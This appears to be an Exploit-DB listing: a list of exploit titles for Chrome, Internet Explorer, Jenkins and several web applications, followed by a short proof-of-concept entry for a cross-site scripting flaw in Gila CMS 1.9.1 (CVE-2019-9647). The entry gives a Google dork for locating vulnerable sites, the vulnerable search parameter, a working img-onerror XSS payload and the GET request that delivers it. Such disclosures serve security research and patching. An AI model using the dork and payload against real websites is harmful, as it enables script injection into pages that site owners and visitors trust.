
16 changes to exploits/shellcodes libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons Google Chrome < M73 - Double-Destruction Race in StoragePartitionService Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML Microsoft VBScript - VbsErase Memory Corruption Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject Google Chrome < M73 - MidiManagerWin Use-After-Free Google Chrome < M73 - FileSystemOperationRunner Use-After-Free Advanced Host Monitor 11.92 beta - Local Buffer Overflow Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit) TheCarProject v2 - Multiple SQL Injection TheCarProject 2 - Multiple SQL Injection Gila CMS 1.9.1 - Cross-Site Scripting MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting eNdonesia Portal 8.7 - Multiple Vulnerabilities Netartmedia Event Portal 2.0 - 'Email' SQL Injection Netartmedia PHP Mall 4.1 - SQL Injection Netartmedia Real Estate Portal 5.0 - SQL Injection
16 lines
No EOL
545 B
Text
16 lines
No EOL
545 B
Text
# Exploit Title: Gila CMS (search) Cross Site Scripting
|
|
# Google Dork: intext:"Powered By Gila CMS"
|
|
# Date: 11.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://gilacms.com
|
|
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
|
|
# Demo Site: https://gilacms.com/demo/
|
|
# Version: 1.9.1
|
|
# Tested on: Kali Linux
|
|
# CVE: CVE-2019-9647
|
|
|
|
# Vulnerable Parameter: search
|
|
|
|
# Payload: <--`<img/src=` onerror=confirm``> --!>
|
|
|
|
# GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!> |